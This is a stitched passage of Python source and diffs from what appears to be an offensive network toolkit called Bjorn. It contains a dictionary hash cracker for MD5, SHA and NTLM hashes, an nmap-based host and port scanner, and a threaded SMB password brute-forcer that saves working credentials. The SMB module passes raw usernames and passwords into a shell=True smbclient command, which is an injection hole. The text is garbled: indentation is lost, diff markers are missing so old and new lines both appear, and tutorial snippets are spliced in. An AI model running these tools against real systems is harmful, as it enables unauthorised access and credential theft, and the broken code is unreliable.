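    # Same substitution chain as the 'l33t' rule above
    return (word.replace('a', '@').replace('e', '3').replace('i', '1')
                .replace('o', '0').replace('s', '5'))

print(l33t("password"))  # → p@55w0rd
```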
    def _hash_password(self, password: str, h_type: str) -> Optional[str]:
        """Generate a hash for a password using the specified algorithm."""
        try:
            if h_type == 'md5':
                return hashlib.md5(password.encode()).hexdigest()
            elif h_type == 'sha1':
                return hashlib.sha1(password.encode()).hexdigest()
            elif h_type == 'sha256':
                return hashlib.sha256(password.encode()).hexdigest()
            elif h_type == 'sha512':
                return hashlib.sha512(password.encode()).hexdigest()
            elif h_type == 'ntlm':
                # NTLM is MD4(UTF-16LE(password))
                return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
        except Exception as e:
            logger.debug(f"Hashing error ({h_type}): {e}")
        return None
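Note that `hashlib.new('md4')` depends on the local OpenSSL build and raises on many modern systems, which is why the helper returns `None` on error. The fixed-algorithm digests can be sanity-checked against well-known test vectors:

```python
import hashlib

def digest(password: str, h_type: str) -> str:
    # subset of the helper above, guaranteed-available algorithms only
    algo = {'md5': hashlib.md5, 'sha1': hashlib.sha1,
            'sha256': hashlib.sha256, 'sha512': hashlib.sha512}[h_type]
    return algo(password.encode()).hexdigest()

print(digest("password", "md5"))  # → 5f4dcc3b5aa765d61d8327deb882cf99
```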
    def _crack_password_worker(self, password: str, progress: ProgressTracker):
        """Worker function: test one candidate password against all loaded hashes."""
        if self.shared_data.orchestrator_should_exit:
            return
        try:
            for h_type in HASH_PATTERNS.keys():
                if self.hash_type and self.hash_type != h_type:
                    continue
                hv = self._hash_password(password, h_type)
                if hv and hv in self.hashes:
                    with self.lock:
                        if hv not in self.cracked:
                            self.cracked[hv] = {
                                "password": password,
                                "type": h_type,
                                "cracked_at": datetime.now().isoformat()
                            }
                            logger.success(f"Cracked {h_type}: {hv[:8]}... -> {password}")
                            self.shared_data.log_milestone(b_class, "Cracked", f"{h_type} found!")
        finally:
            progress.advance()
def execute(self, ip, port, row, status_key) -> str:
"""Standard Orchestrator entry point."""
input_file = str(getattr(self.shared_data, "rune_cracker_input", ""))
wordlist_path = str(getattr(self.shared_data, "rune_cracker_wordlist", ""))
self.hash_type = getattr(self.shared_data, "rune_cracker_type", None)
output_dir = getattr(self.shared_data, "rune_cracker_output", "/home/bjorn/Bjorn/data/output/hashes")
if not input_file or not os.path.exists(input_file):
# Fallback: Check for latest odin_recon or other hashes if running in generic mode
potential_input = os.path.join(self.shared_data.data_dir, "output", "packets", "latest_hashes.txt")
if os.path.exists(potential_input):
input_file = potential_input
logger.info(f"RuneCracker: No input provided, using fallback: {input_file}")
else:
logger.error(f"Input file not found: {input_file}")
return "failed"
        # Load hashes
        self.hashes.clear()
        try:
            with open(input_file, 'r', encoding="utf-8", errors="ignore") as f:
                for line in f:
                    hv = line.strip()
                    if not hv:
                        continue
                    # Auto-detect or validate the hash type
                    for h_t, pat in HASH_PATTERNS.items():
                        if re.match(pat, hv):
                            if not self.hash_type or self.hash_type == h_t:
                                self.hashes.add(hv)
                            break
        except Exception as e:
            logger.error(f"Error loading hashes: {e}")
            return "failed"
        if not self.hashes:
            logger.warning("No valid hashes found in input file.")
            return "failed"
        logger.info(f"RuneCracker: Loaded {len(self.hashes)} hashes. Starting engine...")
        self.shared_data.log_milestone(b_class, "Initialization", f"Loaded {len(self.hashes)} hashes")
# Prepare password plan
dict_passwords = []
if wordlist_path and os.path.exists(wordlist_path):
with open(wordlist_path, 'r', encoding="utf-8", errors="ignore") as f:
dict_passwords = [l.strip() for l in f if l.strip()]
else:
# Fallback tiny list
dict_passwords = ['password', 'admin', '123456', 'qwerty', 'bjorn']
dictionary, fallback = merged_password_plan(self.shared_data, dict_passwords)
all_candidates = dictionary + fallback
progress = ProgressTracker(self.shared_data, len(all_candidates))
self.shared_data.log_milestone(b_class, "Bruteforce", f"Testing {len(all_candidates)} candidates")
        try:
            with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
                for pwd in all_candidates:
                    if self.shared_data.orchestrator_should_exit:
                        executor.shutdown(wait=False)
                        return "interrupted"
                    executor.submit(self._crack_password_worker, pwd, progress)
        except Exception as e:
            logger.error(f"Cracking engine error: {e}")
            return "failed"
# Save results
if self.cracked:
os.makedirs(output_dir, exist_ok=True)
out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
with open(out_file, 'w', encoding="utf-8") as f:
json.dump({
"target_file": input_file,
"total_hashes": len(self.hashes),
"cracked_count": len(self.cracked),
"results": self.cracked
}, f, indent=4)
logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
return "success"
logger.info("Cracking finished. No matches found.")
self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
return "success" # Still success even if 0 cracked, as it finished the task
if __name__ == "__main__":
# Minimal CLI for testing
import sys
from init_shared import shared_data
if len(sys.argv) < 2:
print("Usage: rune_cracker.py <hash_file>")
sys.exit(1)
shared_data.rune_cracker_input = sys.argv[1]
cracker = RuneCracker(shared_data)
cracker.execute("local", None, {}, "rune_cracker")


@@ -1,20 +1,24 @@
# scanning.py — Network scanner (DB-first, no stubs)
# - Host discovery (nmap -sn -PR)
# - Resolve MAC/hostname (ThreadPoolExecutor) -> DB (hosts table)
# - Port scan (ThreadPoolExecutor) -> DB (merge ports by MAC)
# - Mark alive=0 for hosts not seen this run
# - Update stats (stats table)
# - Light logging (milestones) without flooding
# - WAL checkpoint(TRUNCATE) + PRAGMA optimize at end of scan
# - No DB insert without a real MAC. Unresolved IPs are kept in-memory.
# - RPi Zero optimized: bounded thread pools, reduced retries, adaptive concurrency
import os
import re
import threading
import socket
import time
import logging
import subprocess
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
import datetime
import netifaces
from getmac import get_mac_address as gma
@@ -35,12 +39,48 @@ b_action = "global"
b_trigger = "on_interval:180"
b_requires = '{"max_concurrent": 1}'
# --- Module-level constants (avoid re-creating per call) ---
_MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
_BAD_MACS = frozenset({"00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"})
# RPi Zero safe defaults (overridable via shared config)
_MAX_HOST_THREADS = 2
_MAX_PORT_THREADS = 4
_PORT_TIMEOUT = 0.8
_MAC_RETRIES = 2
_MAC_RETRY_DELAY = 0.5
_ARPING_TIMEOUT = 1.0
_NMAP_DISCOVERY_TIMEOUT_S = 90
_NMAP_DISCOVERY_ARGS = "-sn -PR --max-retries 1 --host-timeout 8s"
_SCAN_MIN_INTERVAL_S = 600
def _normalize_mac(s):
if not s:
return None
m = _MAC_RE.search(str(s))
if not m:
return None
return m.group(0).replace('-', ':').lower()
def _is_bad_mac(mac):
if not mac:
return True
mac_l = mac.lower()
if mac_l in _BAD_MACS:
return True
parts = mac_l.split(':')
if len(parts) == 6 and len(set(parts)) == 1:
return True
return False
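The module-level regex and helpers above can be exercised in isolation; this sketch duplicates `_MAC_RE` and the normalization logic so it runs standalone:

```python
import re

# Same pattern as _MAC_RE above; normalization lowercases and maps '-' to ':'
MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')

def normalize_mac(s):
    m = MAC_RE.search(str(s or ""))
    return m.group(0).replace('-', ':').lower() if m else None

print(normalize_mac("AA-BB-CC-DD-EE-FF"))  # → aa:bb:cc:dd:ee:ff
# Also works on raw tool output, e.g. an `ip neigh` / arp line:
print(normalize_mac("? (192.168.1.10) at b8:27:eb:12:34:56 [ether]"))  # → b8:27:eb:12:34:56
```

Using `search` rather than `match` is what lets the scanner pull a MAC out of arbitrary `arp-scan` or `ip neigh` output lines.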
class NetworkScanner:
"""
Network scanner that populates SQLite (hosts + stats). No CSV/JSON.
    Uses ThreadPoolExecutor for bounded concurrency (RPi Zero safe).
    No 'IP:<ip>' stubs are ever written to the DB; unresolved IPs are tracked in-memory.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
@@ -52,8 +92,26 @@ class NetworkScanner:
self.lock = threading.Lock()
self.nm = nmap.PortScanner()
self.running = False
# Local stop flag for this action instance.
# IMPORTANT: actions must never mutate shared_data.orchestrator_should_exit (global stop signal).
self._stop_event = threading.Event()
self.thread = None
self.scan_interface = None
cfg = getattr(self.shared_data, "config", {}) or {}
self.max_host_threads = max(1, min(8, int(cfg.get("scan_max_host_threads", _MAX_HOST_THREADS))))
self.max_port_threads = max(1, min(16, int(cfg.get("scan_max_port_threads", _MAX_PORT_THREADS))))
self.port_timeout = max(0.3, min(3.0, float(cfg.get("scan_port_timeout_s", _PORT_TIMEOUT))))
self.mac_retries = max(1, min(5, int(cfg.get("scan_mac_retries", _MAC_RETRIES))))
self.mac_retry_delay = max(0.2, min(2.0, float(cfg.get("scan_mac_retry_delay_s", _MAC_RETRY_DELAY))))
self.arping_timeout = max(1.0, min(5.0, float(cfg.get("scan_arping_timeout_s", _ARPING_TIMEOUT))))
self.discovery_timeout_s = max(
20, min(300, int(cfg.get("scan_nmap_discovery_timeout_s", _NMAP_DISCOVERY_TIMEOUT_S)))
)
self.discovery_args = str(cfg.get("scan_nmap_discovery_args", _NMAP_DISCOVERY_ARGS)).strip() or _NMAP_DISCOVERY_ARGS
self.scan_min_interval_s = max(60, int(cfg.get("scan_min_interval_s", _SCAN_MIN_INTERVAL_S)))
self._last_scan_started = 0.0
# progress
self.total_hosts = 0
self.scanned_hosts = 0
@@ -76,9 +134,13 @@ class NetworkScanner:
total = min(max(total, 0), 100)
self.shared_data.bjorn_progress = f"{int(total)}%"
def _should_stop(self) -> bool:
# Treat orchestrator flag as read-only, and combine with local stop event.
return bool(getattr(self.shared_data, "orchestrator_should_exit", False)) or self._stop_event.is_set()
# ---------- network ----------
def get_network(self):
        if self._should_stop():
return None
try:
if self.shared_data.use_custom_network:
@@ -118,7 +180,7 @@ class NetworkScanner:
self.logger.debug(f"nmap_prefixes not found at {path}")
return vendor_map
try:
with open(path, 'r') as f:
with open(path, 'r', encoding='utf-8', errors='ignore') as f:
for line in f:
line = line.strip()
if not line or line.startswith('#'):
@@ -139,8 +201,11 @@ class NetworkScanner:
def get_current_essid(self):
try:
            result = subprocess.run(
                ['iwgetid', '-r'],
                capture_output=True, text=True, timeout=5
            )
            return (result.stdout or "").strip()
except Exception:
return ""
@@ -160,57 +225,34 @@ class NetworkScanner:
Try multiple strategies to resolve a real MAC for the given IP.
RETURNS: normalized MAC like 'aa:bb:cc:dd:ee:ff' or None.
NEVER returns 'IP:<ip>'.
RPi Zero: reduced retries and timeouts.
"""
        if self._should_stop():
            return None
try:
mac = None
            # 1) getmac (reduced retries for RPi Zero)
            retries = self.mac_retries
            while not mac and retries > 0 and not self._should_stop():
try:
from getmac import get_mac_address as gma
mac = _normalize_mac(gma(ip=ip))
except Exception:
mac = None
if not mac:
                    time.sleep(self.mac_retry_delay)
retries -= 1
# 2) targeted arp-scan
            if not mac and not self._should_stop():
try:
iface = self.scan_interface or self.shared_data.default_network_interface or "wlan0"
                    result = subprocess.run(
                        ['sudo', 'arp-scan', '--interface', iface, '-q', ip],
                        capture_output=True, text=True, timeout=5
                    )
                    out = result.stdout or ""
for line in out.splitlines():
if line.strip().startswith(ip):
cand = _normalize_mac(line)
@@ -225,11 +267,13 @@ class NetworkScanner:
self.logger.debug(f"arp-scan fallback failed for {ip}: {e}")
# 3) ip neigh
            if not mac and not self._should_stop():
try:
                    result = subprocess.run(
                        ['ip', 'neigh', 'show', ip],
                        capture_output=True, text=True, timeout=3
                    )
                    cand = _normalize_mac(result.stdout or "")
if cand:
mac = cand
except Exception:
@@ -247,6 +291,7 @@ class NetworkScanner:
# ---------- port scanning ----------
class PortScannerWorker:
"""Port scanner using ThreadPoolExecutor for RPi Zero safety."""
def __init__(self, outer, target, open_ports, portstart, portend, extra_ports):
self.outer = outer
self.target = target
@@ -256,10 +301,10 @@ class NetworkScanner:
self.extra_ports = [int(p) for p in (extra_ports or [])]
def scan_one(self, port):
            if self.outer._should_stop():
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.settimeout(self.outer.port_timeout)
try:
s.connect((self.target, port))
with self.outer.lock:
@@ -274,25 +319,25 @@ class NetworkScanner:
self.outer.update_progress('port', 1)
def run(self):
            if self.outer._should_stop():
return
ports = list(range(self.portstart, self.portend)) + self.extra_ports
if not ports:
return
with ThreadPoolExecutor(max_workers=self.outer.max_port_threads) as pool:
futures = []
for port in ports:
if self.outer._should_stop():
break
futures.append(pool.submit(self.scan_one, port))
for f in as_completed(futures):
if self.outer._should_stop():
break
try:
f.result(timeout=self.outer.port_timeout + 1)
except Exception:
pass
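The bounded pool above is the whole trick: instead of one thread per port (thousands of threads on a wide range), at most `max_port_threads` sockets are in flight at once. A self-contained sketch of that connect-scan pattern, using a throwaway local listener as the target (illustrative names, not this module's API):

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor

# A throwaway listener on 127.0.0.1 plays the target; port 0 = OS-assigned.
listener = socket.socket()
listener.bind(("127.0.0.1", 0))
listener.listen(1)
open_port = listener.getsockname()[1]

found, lock = set(), threading.Lock()

def probe(port):
    # TCP connect scan: a successful connect() means the port is open
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(0.5)
    try:
        s.connect(("127.0.0.1", port))
        with lock:
            found.add(port)
    except OSError:
        pass  # refused or timed out -> closed/filtered
    finally:
        s.close()

with ThreadPoolExecutor(max_workers=4) as pool:  # bounded, like max_port_threads
    pool.map(probe, [open_port, open_port + 1])

listener.close()
print(open_port in found)  # → True
```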
# ---------- main scan block ----------
class ScanPorts:
@@ -310,20 +355,28 @@ class NetworkScanner:
self.extra_ports = [int(p) for p in (extra_ports or [])]
self.ip_data = self.IpData()
self.ip_hostname_list = [] # tuples (ip, hostname, mac)
self.open_ports = {}
self.all_ports = []
            # per-run pending cache for unresolved IPs (no DB writes)
            # ip -> {'hostnames': set(), 'ports': set(), 'first_seen': ts, 'essid': str}
self.pending = {}
def scan_network_and_collect(self):
            if self.outer._should_stop():
return
with self.outer.lock:
self.outer.shared_data.bjorn_progress = "1%"
t0 = time.time()
try:
self.outer.nm.scan(
hosts=str(self.network),
arguments=self.outer.discovery_args,
timeout=self.outer.discovery_timeout_s,
)
except Exception as e:
self.outer.logger.error(f"Nmap host discovery failed: {e}")
return
hosts = list(self.outer.nm.all_hosts())
if self.outer.blacklistcheck:
hosts = [ip for ip in hosts if ip not in self.outer.ip_scan_blacklist]
@@ -331,10 +384,23 @@ class NetworkScanner:
self.outer.total_hosts = len(hosts)
self.outer.scanned_hosts = 0
self.outer.update_progress('host', 0)
self.outer.logger.info(f"Host discovery: {len(hosts)} candidate(s) (took {time.time()-t0:.1f}s)")
elapsed = time.time() - t0
self.outer.logger.info(f"Host discovery: {len(hosts)} candidate(s) (took {elapsed:.1f}s)")
# Update comment for display
self.outer.shared_data.comment_params = {
"hosts_found": str(len(hosts)),
"network": str(self.network),
"elapsed": f"{elapsed:.1f}"
}
# existing hosts (for quick merge)
try:
existing_rows = self.outer.shared_data.db.get_all_hosts()
except Exception as e:
self.outer.logger.error(f"DB get_all_hosts failed: {e}")
existing_rows = []
self.existing_map = {h['mac_address']: h for h in existing_rows}
self.seen_now = set()
@@ -342,19 +408,24 @@ class NetworkScanner:
self.vendor_map = self.outer.load_mac_vendor_map()
self.essid = self.outer.get_current_essid()
# per-host threads with bounded pool
max_threads = min(self.outer.max_host_threads, len(hosts)) if hosts else 1
with ThreadPoolExecutor(max_workers=max_threads) as pool:
futures = {}
for host in hosts:
if self.outer._should_stop():
break
f = pool.submit(self.scan_host, host)
futures[f] = host
# wait
for f in as_completed(futures):
if self.outer._should_stop():
break
try:
f.result(timeout=30)
except Exception as e:
ip = futures.get(f, "?")
self.outer.logger.error(f"Host scan thread failed for {ip}: {e}")
self.outer.logger.info(
f"Host mapping completed: {self.outer.scanned_hosts}/{self.outer.total_hosts} processed, "
@@ -364,7 +435,10 @@ class NetworkScanner:
# mark unseen as alive=0
existing_macs = set(self.existing_map.keys())
for mac in existing_macs - self.seen_now:
try:
self.outer.shared_data.db.update_host(mac_address=mac, alive=0)
except Exception as e:
self.outer.logger.error(f"Failed to mark {mac} as dead: {e}")
# feed ip_data
for ip, hostname, mac in self.ip_hostname_list:
@@ -373,13 +447,19 @@ class NetworkScanner:
self.ip_data.mac_list.append(mac)
def scan_host(self, ip):
            if self.outer._should_stop():
return
if self.outer.blacklistcheck and ip in self.outer.ip_scan_blacklist:
return
try:
# ARP ping to help populate neighbor cache (subprocess with timeout)
try:
subprocess.run(
['arping', '-c', '2', '-w', str(self.outer.arping_timeout), ip],
capture_output=True, timeout=self.outer.arping_timeout + 2
)
except Exception:
pass
# Hostname (validated)
hostname = ""
@@ -393,7 +473,7 @@ class NetworkScanner:
self.outer.update_progress('host', 1)
return
            time.sleep(0.5)  # let ARP breathe (reduced from 1.0 for RPi Zero speed)
mac = self.outer.get_mac_address(ip, hostname)
if mac:
@@ -431,10 +511,12 @@ class NetworkScanner:
if ip:
ips_set.add(ip)
# Update current hostname + track history
current_hn = ""
if hostname:
try:
self.outer.shared_data.db.update_hostname(mac, hostname)
except Exception as e:
self.outer.logger.error(f"Failed to update hostname for {mac}: {e}")
current_hn = hostname
else:
current_hn = (prev.get('hostnames') or "").split(';', 1)[0] if prev else ""
@@ -444,15 +526,18 @@ class NetworkScanner:
key=lambda x: tuple(map(int, x.split('.'))) if x.count('.') == 3 else (0, 0, 0, 0)
)) if ips_set else None
try:
self.outer.shared_data.db.update_host(
mac_address=mac,
ips=ips_sorted,
hostnames=None,
alive=1,
ports=None,
vendor=vendor or (prev.get('vendor') if prev else ""),
essid=self.essid or (prev.get('essid') if prev else None)
)
except Exception as e:
self.outer.logger.error(f"Failed to update host {mac}: {e}")
# refresh local cache
self.existing_map[mac] = dict(
@@ -467,19 +552,26 @@ class NetworkScanner:
with self.outer.lock:
self.ip_hostname_list.append((ip, hostname or "", mac))
# Update comment params for live display
self.outer.shared_data.comment_params = {
"ip": ip, "mac": mac,
"hostname": hostname or "unknown",
"vendor": vendor or "unknown"
}
self.outer.logger.debug(f"MAC for {ip}: {mac} (hostname: {hostname or '-'})")
except Exception as e:
self.outer.logger.error(f"Error scanning host {ip}: {e}")
finally:
self.outer.update_progress('host', 1)
                time.sleep(0.02)
def start(self):
            if self.outer._should_stop():
return
self.scan_network_and_collect()
            if self.outer._should_stop():
return
# init structures for ports
@@ -496,12 +588,22 @@ class NetworkScanner:
f"(+{len(self.extra_ports)} extra)"
)
            # per-IP port scan (bounded worker pool)
for idx, ip in enumerate(self.ip_data.ip_list, 1):
                if self.outer._should_stop():
return
# Update comment params for live display
self.outer.shared_data.comment_params = {
"ip": ip, "progress": f"{idx}/{total_targets}",
"ports_found": str(sum(len(v) for v in self.open_ports.values()))
}
worker = self.outer.PortScannerWorker(
self.outer, ip, self.open_ports,
self.portstart, self.portend, self.extra_ports
)
worker.run()
if idx % 10 == 0 or idx == total_targets:
found = sum(len(v) for v in self.open_ports.values())
self.outer.logger.info(
@@ -517,13 +619,27 @@ class NetworkScanner:
# ---------- orchestration ----------
def scan(self):
# Reset only local stop flag for this action. Never touch orchestrator_should_exit here.
self._stop_event.clear()
try:
            if self._should_stop():
self.logger.info("Orchestrator switched to manual mode. Stopping scanner.")
return
now = time.time()
elapsed = now - self._last_scan_started if self._last_scan_started else 1e9
if elapsed < self.scan_min_interval_s:
remaining = int(self.scan_min_interval_s - elapsed)
self.logger.info_throttled(
f"Network scan skipped (min interval active, remaining={remaining}s)",
key="scanner_min_interval_skip",
interval_s=15.0,
)
return
self._last_scan_started = now
self.shared_data.bjorn_orch_status = "NetworkScanner"
self.shared_data.comment_params = {}
self.logger.info("Starting Network Scanner")
# network
@@ -535,6 +651,7 @@ class NetworkScanner:
return
self.shared_data.bjorn_status_text2 = str(network)
self.shared_data.comment_params = {"network": str(network)}
portstart = int(self.shared_data.portstart)
portend = int(self.shared_data.portend)
extra_ports = self.shared_data.portlist
@@ -547,21 +664,22 @@ class NetworkScanner:
ip_data, open_ports_by_ip, all_ports, alive_macs = result
            if self._should_stop():
self.logger.info("Scan canceled before DB finalization.")
return
            # push ports -> DB (merge by MAC); only for IPs with a known MAC
ip_to_mac = {ip: mac for ip, _, mac in zip(ip_data.ip_list, ip_data.hostname_list, ip_data.mac_list)}
# existing cache
try:
existing_map = {h['mac_address']: h for h in self.shared_data.db.get_all_hosts()}
except Exception as e:
self.logger.error(f"DB get_all_hosts for port merge failed: {e}")
existing_map = {}
for ip, ports in open_ports_by_ip.items():
mac = ip_to_mac.get(ip)
if not mac:
# store to pending (no DB write)
slot = scanner.pending.setdefault(
ip,
{'hostnames': set(), 'ports': set(), 'first_seen': int(time.time()), 'essid': scanner.essid}
@@ -578,16 +696,19 @@ class NetworkScanner:
pass
ports_set.update(str(p) for p in (ports or []))
try:
self.shared_data.db.update_host(
mac_address=mac,
ports=';'.join(sorted(ports_set, key=lambda x: int(x))),
alive=1
)
except Exception as e:
self.logger.error(f"Failed to update ports for {mac}: {e}")
            # Late resolution pass: try to resolve pending IPs before stats
unresolved_before = len(scanner.pending)
for ip, data in list(scanner.pending.items()):
                if self._should_stop():
break
try:
guess_hostname = next(iter(data['hostnames']), "")
@@ -595,25 +716,28 @@ class NetworkScanner:
guess_hostname = ""
mac = self.get_mac_address(ip, guess_hostname)
if not mac:
                    continue  # still unresolved for this run
mac = mac.lower()
vendor = self.mac_to_vendor(mac, scanner.vendor_map)
# create/update host now
                try:
                    self.shared_data.db.update_host(
                        mac_address=mac,
                        ips=ip,
                        hostnames=';'.join(data['hostnames']) or None,
                        vendor=vendor,
                        essid=data.get('essid'),
                        alive=1
                    )
                    if data['ports']:
                        self.shared_data.db.update_host(
                            mac_address=mac,
                            ports=';'.join(str(p) for p in sorted(data['ports'], key=int)),
                            alive=1
                        )
                except Exception as e:
                    self.logger.error(f"Failed to resolve pending IP {ip}: {e}")
                    continue
del scanner.pending[ip]
if scanner.pending:
@@ -622,8 +746,13 @@ class NetworkScanner:
f"(resolved during late pass: {unresolved_before - len(scanner.pending)})"
)
            # stats (alive hosts, total open ports, distinct vulnerabilities)
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
self.logger.error(f"DB get_all_hosts for stats failed: {e}")
rows = []
alive_hosts = [r for r in rows if int(r.get('alive') or 0) == 1]
all_known = len(rows)
@@ -641,12 +770,23 @@ class NetworkScanner:
except Exception:
vulnerabilities_count = 0
try:
self.shared_data.db.set_stats(
total_open_ports=total_open_ports,
alive_hosts_count=len(alive_hosts),
all_known_hosts_count=all_known,
vulnerabilities_count=int(vulnerabilities_count)
)
except Exception as e:
self.logger.error(f"Failed to set stats: {e}")
# Update comment params with final stats
self.shared_data.comment_params = {
"alive_hosts": str(len(alive_hosts)),
"total_ports": str(total_open_ports),
"vulns": str(int(vulnerabilities_count)),
"network": str(network)
}
# WAL checkpoint + optimize
try:
@@ -661,7 +801,7 @@ class NetworkScanner:
self.logger.info("Network scan complete (DB updated).")
except Exception as e:
            if self._should_stop():
self.logger.info("Orchestrator switched to manual mode. Gracefully stopping the network scanner.")
else:
self.logger.error(f"Error in scan: {e}")
@@ -673,7 +813,9 @@ class NetworkScanner:
def start(self):
if not self.running:
self.running = True
self._stop_event.clear()
# Non-daemon so orchestrator can join it reliably (no orphan thread).
self.thread = threading.Thread(target=self.scan_wrapper, daemon=False)
self.thread.start()
logger.info("NetworkScanner started.")
@@ -683,25 +825,22 @@ class NetworkScanner:
finally:
with self.lock:
self.shared_data.bjorn_progress = ""
self.running = False
logger.debug("bjorn_progress reset to empty string")
def stop(self):
if self.running:
self.running = False
self._stop_event.set()
try:
if hasattr(self, "thread") and self.thread.is_alive():
                    self.thread.join(timeout=15)
except Exception:
pass
logger.info("NetworkScanner stopped.")
if __name__ == "__main__":
# SharedData must provide .db (BjornDatabase) and fields:
# default_network_interface, use_custom_network, custom_network,
# portstart, portend, portlist, blacklistcheck, mac/ip/hostname blacklists,
# bjorn_progress, bjorn_orch_status, bjorn_status_text2, orchestrator_should_exit.
from shared import SharedData
sd = SharedData()
scanner = NetworkScanner(sd)


@@ -1,8 +1,8 @@
"""
smb_bruteforce.py SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles fournies par lorchestrateur (ip, port)
"""
smb_bruteforce.py — SMB bruteforce (DB-backed, no CSV/JSON, no rich)
- Cibles fournies par l’orchestrateur (ip, port)
- IP -> (MAC, hostname) depuis DB.hosts
- Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>)
- Succès enregistrés dans DB.creds (service='smb'), 1 ligne PAR PARTAGE (database=<share>)
- Conserve la logique de queue/threads et les signatures. Plus de rich/progress.
"""
@@ -10,12 +10,13 @@ import os
import threading
import logging
import time
from subprocess import Popen, PIPE, TimeoutExpired
from smb.SMBConnection import SMBConnection
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="smb_bruteforce.py", level=logging.DEBUG)
@@ -47,19 +48,20 @@ class SMBBruteforce:
return self.smb_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Point d’entrée orchestrateur (retour 'success' / 'failed')."""
"""Point d'entrée orchestrateur (retour 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SMBBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""Gère les tentatives SMB, la persistance DB et le mapping IP→(MAC, Hostname)."""
"""Gère les tentatives SMB, la persistance DB et le mapping IP→(MAC, Hostname)."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists inchangées
# Wordlists inchangées
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
@@ -70,6 +72,7 @@ class SMBConnector:
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [mac, ip, hostname, share, user, password, port]
self.queue = Queue()
self.progress = None
# ---------- util fichiers ----------
@staticmethod
@@ -115,8 +118,9 @@ class SMBConnector:
# ---------- SMB ----------
def smb_connect(self, adresse_ip: str, user: str, password: str) -> List[str]:
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
try:
conn.connect(adresse_ip, 445)
conn.connect(adresse_ip, 445, timeout=timeout)
shares = conn.listShares()
accessible = []
for share in shares:
@@ -127,7 +131,7 @@ class SMBConnector:
accessible.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
logger.debug(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
try:
conn.close()
except Exception:
@@ -137,10 +141,22 @@ class SMBConnector:
return []
def smbclient_l(self, adresse_ip: str, user: str, password: str) -> List[str]:
timeout = int(getattr(self.shared_data, "smb_connect_timeout_s", 6))
cmd = f'smbclient -L {adresse_ip} -U {user}%{password}'
process = None
try:
process = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
try:
stdout, stderr = process.communicate(timeout=timeout)
except TimeoutExpired:
try:
process.kill()
except Exception:
pass
try:
stdout, stderr = process.communicate(timeout=2)
except Exception:
stdout, stderr = b"", b""
if b"Sharename" in stdout:
logger.info(f"Successful auth for {adresse_ip} with '{user}' using smbclient -L")
return self.parse_shares(stdout.decode(errors="ignore"))
@@ -150,6 +166,23 @@ class SMBConnector:
except Exception as e:
logger.error(f"Error executing '{cmd}': {e}")
return []
finally:
if process:
try:
if process.poll() is None:
process.kill()
except Exception:
pass
try:
if process.stdout:
process.stdout.close()
except Exception:
pass
try:
if process.stderr:
process.stderr.close()
except Exception:
pass
@staticmethod
def parse_shares(smbclient_output: str) -> List[str]:
@@ -216,10 +249,13 @@ class SMBConnector:
continue
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Share:{share}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "share": shares[0] if shares else ""}
self.save_results()
self.removeduplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
@@ -228,69 +264,82 @@ class SMBConnector:
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
mac_address = self.mac_for_ip(adresse_ip)
hostname = self.hostname_for_ip(adresse_ip) or ""
total_tasks = len(self.users) * len(self.passwords)
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords) + len(dict_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
threads = []
thread_count = min(40, max(1, total_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
try:
self.queue.get_nowait()
self.queue.task_done()
except Exception:
break
break
self.queue.join()
for t in threads:
t.join()
